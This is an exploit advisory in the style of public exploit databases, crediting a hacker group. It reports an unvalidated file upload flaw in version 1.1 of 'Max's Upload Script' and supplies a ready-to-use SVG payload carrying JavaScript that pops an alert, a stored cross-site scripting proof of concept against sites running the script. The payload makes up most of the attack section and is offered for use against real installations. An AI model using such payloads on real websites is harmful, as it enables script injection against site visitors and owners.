[+] Exploit Title ; Max’s Upload Script unvaliated file upload Vulnerability
[+] Date : 2018-01-22
[+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS
[+] Vendor HomePage : http://www.xscript.ir
[+] Dork : N/A
[+] Version : 1.1
[+] Tested On : windows 10 - kali linux 2.0
[+] Contact : https://telegram.me/WebServer
[+] Poc :
[*] Ajax File upload is a script for uploading file
[*] But there is no security in this script
[*] And You Can Upload Any File For Example svg files :
[*] You Can Use This Payload :
[+] Payload :
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">
alert('Hacked bY : 0P3N3R');
</script>
</svg>
[+] Exploitation Technique:
[!] remote
[+] Severity Level:
[!] High
[+] We Are :
[!] 0P3N3R [+] Mehrdad_Ice [+] BaxTurk24 [+] S0hp